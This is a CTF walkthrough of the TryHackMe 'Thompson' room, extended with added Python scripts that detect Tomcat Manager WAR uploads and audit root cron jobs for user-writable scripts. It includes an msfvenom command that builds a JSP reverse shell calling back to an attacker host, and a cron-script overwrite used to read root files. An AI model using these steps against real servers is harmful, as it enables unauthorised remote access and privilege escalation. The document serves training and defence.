TryHackMe | Thompson Walkthrough
boot2root machine for FIT and BSides Guatemala CTF
This is a relatively easy CTF room that requires knowledge of using reverse shells and cron jobs.
This walkthrough is written as part of the Master's certificate in cybersecurity (Red Team) that I am pursuing from HackeU.
Reconnaissance
Starting with a regular nmap scan:
nmap -sS -sV -A <IP>
We discover that 3 ports are open:
22/tcp — ssh — OpenSSH
8009/tcp — ajp13 — Apache Jserv
8080/tcp — http — Apache Tomcat
As port 8080 is open and running an HTTP service, there is also a web page available.
After some digging, when I clicked on the Manager App button it showed me a login dialog box.
I didn't have any credentials, but when I closed the box it redirected me to a page that showed the XML code for the credentials, which I used to log in.
After logging in, we see the admin dashboard for the website.
We also have an upload option that accepts only .war files, so I used msfvenom to create a reverse shell payload with a .war extension.
After uploading the file we see it listed on the web page, and when we click it, it gives a reverse connection to our netcat listener.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_IP> LPORT=4444 -f war > back.war
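From the defender's side, the step above leaves a clear trace: the Tomcat Manager is hit without credentials, then with credentials, then a WAR file is uploaded through /manager/html/upload. The following script is an added example written for this walkthrough (it is not part of the original post or of Tomcat) that scans a Tomcat access log for manager deployments and manager authentication failures. It assumes the default AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b); the log lines inside it are constructed for the demo, not taken from the target machine.

```python
"""Flag Tomcat Manager deployments and manager login failures in an access log.

Added example for the Tomcat Manager step in the walkthrough; not part of the
original post or of Tomcat. It assumes the default AccessLogValve "common"
pattern (%h %l %u %t "%r" %s %b); adjust LINE_RE if your valve uses another one.
"""
import re
from typing import Dict, List, Optional

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Constructed sample lines (not from the target host): an unauthenticated hit on the
# manager, a successful login, a WAR upload through the HTML interface, normal traffic.
SAMPLE_ACCESS_LOG = """\
10.10.14.5 - - [13/Aug/2020:11:02:58 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [13/Aug/2020:11:03:10 +0000] "GET /manager/html HTTP/1.1" 200 12109
10.10.14.5 - tomcat [13/Aug/2020:11:03:21 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 12456
10.10.14.5 - - [13/Aug/2020:11:03:30 +0000] "GET /back/ HTTP/1.1" 200 0
192.168.1.20 - - [13/Aug/2020:11:05:00 +0000] "GET /docs/ HTTP/1.1" 200 1887
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one access-log line into its fields, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec: Dict[str, str]) -> Optional[str]:
    """Return an event kind for manager-related requests, or None for ordinary traffic."""
    path = rec["path"].split("?", 1)[0]          # drop the query string (CSRF nonce etc.)
    method, status = rec["method"], rec["status"]
    if method == "POST" and path == "/manager/html/upload":
        return "manager_deploy"                   # WAR uploaded via the HTML manager
    if method == "PUT" and path.startswith("/manager/text/deploy"):
        return "manager_deploy"                   # WAR uploaded via the text/scripting interface
    if path.startswith("/manager") and status in ("401", "403"):
        return "manager_auth_failure"             # probe or wrong credentials against the manager
    return None


def detect_manager_events(log_text: str) -> List[Dict[str, str]]:
    """Scan access-log text and return every manager deployment or auth failure found."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec)
        if kind:
            events.append({"kind": kind, "ip": rec["ip"], "user": rec["user"],
                           "ts": rec["ts"], "path": rec["path"].split("?", 1)[0]})
    return events


if __name__ == "__main__":
    for ev in detect_manager_events(SAMPLE_ACCESS_LOG):
        print(f"{ev['ts']} {ev['kind']:<22} {ev['ip']} user={ev['user']} {ev['path']}")
```

Any manager_deploy event from an address that is not a known deployment host is worth an alert on its own; a 401 on /manager followed within seconds by a successful deployment from the same IP is the pattern this room produces. The better fix is not to expose the manager application at all, or to keep the manager-gui role on an account whose credentials are not reachable from the web server's own pages.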
Finding Flags
Found the first flag in the /home/jack directory.
Privilege escalation
We also see an id.sh file, and after some digging I found out that a cron job is associated with id.sh, which executes the commands in the file every minute.
cat /etc/crontab
We use this to escalate our privileges.
As the .sh file runs every minute, we can write our command into it and simply wait for it to be executed.
echo "cp /root/root.txt /home/jack/root.txt" > id.sh
After one minute, our command has executed successfully.
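The root cause here is a root cron job that runs a script a low-privileged user owns. The audit script below is an added example written for this walkthrough (not part of the original post) that parses an /etc/crontab-style file and flags any entry whose script is owned by a user other than the one the job runs as, or is group/world writable. The crontab text and the ownership table in it are constructed for the demo; on a real host, pass fs_stat as the lookup to use the actual file system.

```python
"""Audit /etc/crontab-style entries for scripts a non-root user can modify.

Added example for the cron job step in the walkthrough; not part of the original
post. A root cron job that executes a script owned or writable by an unprivileged
user lets that user run commands as root, which is the misconfiguration the room
is built around. This tool reports such entries so they can be fixed.
"""
import os
import pwd
import re
import stat
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample in /etc/crontab format (minute hour dom mon dow user command).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    cd /home/jack && bash id.sh
"""

# Constructed ownership/mode table standing in for os.stat on the target host.
SAMPLE_STAT: Dict[str, Tuple[str, int]] = {
    "/etc/cron.hourly": ("root", 0o755),
    "/home/jack/id.sh": ("jack", 0o755),
}

StatLookup = Callable[[str], Optional[Tuple[str, int]]]


def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (user, command) pairs, ignoring comments, blank lines and VAR=VALUE lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue  # @reboot-style or malformed line; not handled by this simple parser
        entries.append((fields[5], fields[6]))
    return entries


def scripts_in_command(command: str) -> List[str]:
    """Resolve script paths referenced by a cron command, honouring a leading 'cd <dir>'."""
    cwd = "/"
    paths = []
    for segment in re.split(r"&&|\|\||;", command):
        tokens = segment.split()
        if not tokens:
            continue
        if tokens[0] == "cd" and len(tokens) > 1:
            cwd = os.path.normpath(os.path.join(cwd, tokens[1]))
            continue
        for tok in tokens:
            if tok.startswith("/") or tok.endswith(".sh"):
                paths.append(os.path.normpath(os.path.join(cwd, tok)))
    return paths


def fs_stat(path: str) -> Optional[Tuple[str, int]]:
    """Real lookup: (owner name, permission bits) for a path, or None if it does not exist."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return pwd.getpwuid(st.st_uid).pw_name, stat.S_IMODE(st.st_mode)


def find_risky_entries(entries: List[Tuple[str, str]], lookup: StatLookup) -> List[Dict[str, str]]:
    """Flag scripts owned by someone other than the cron user, or writable by group/others."""
    findings = []
    for user, command in entries:
        for path in scripts_in_command(command):
            info = lookup(path)
            if info is None:
                continue  # path missing or not a file we can stat; nothing to judge
            owner, mode = info
            if owner != user:
                reason = f"owned by {owner}, runs as {user}"
            elif mode & (stat.S_IWGRP | stat.S_IWOTH):
                reason = f"group/world writable ({oct(mode)})"
            else:
                continue
            findings.append({"user": user, "path": path, "reason": reason})
    return findings


def audit_sample() -> List[Dict[str, str]]:
    """Run the audit against the constructed crontab and ownership table."""
    return find_risky_entries(parse_system_crontab(SAMPLE_CRONTAB), SAMPLE_STAT.get)


if __name__ == "__main__":
    for f in audit_sample():
        print(f"[!] {f['path']} ({f['reason']})")
```

To run it against a live box, replace SAMPLE_STAT.get with fs_stat and feed it the contents of /etc/crontab and the files under /etc/cron.d. The fix for a hit like /home/jack/id.sh is to move the script to a root-owned, non-writable location (or run the job as the user who owns it); a change-monitoring rule on scripts referenced by root cron entries catches the edit itself.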
And we completed the room. Do leave some claps if this helped you in any way.